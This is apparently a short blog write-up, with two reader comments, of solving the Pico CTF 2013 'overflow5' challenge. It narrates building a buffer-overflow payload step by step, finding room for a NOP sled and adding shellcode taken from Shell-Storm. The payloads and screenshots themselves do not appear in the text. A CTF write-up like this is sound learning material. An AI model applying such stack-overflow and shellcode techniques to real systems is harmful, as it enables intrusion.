This time I tried overflow5 from Pico CTF 2013. Below you will find the details...
Let's go:
I started with small payload (200b):
Little surprise - nothing happened... Recreating payload:
Checking:
Still nothing... Recreating payload again:
Now looks better:
Checking:
Now memory looks better:
More to find where to store our NOPs...
... with shellcode (found on Shell-Storm - thanks!):
And we should be right here:
Cool. :)
See you next time!
Cheers
On screenshot #6 how exactly is the segfault happening at 0x42424242 while your pattern (generated by poc.py) does not contain such string?
OdpowiedzUsuńHi, there was also an 'edit' (via vim poc.py) to generate a `cat 5d` payload. So at this moment I changed it to 42424242. Hope that helps.
UsuńThanks for watching!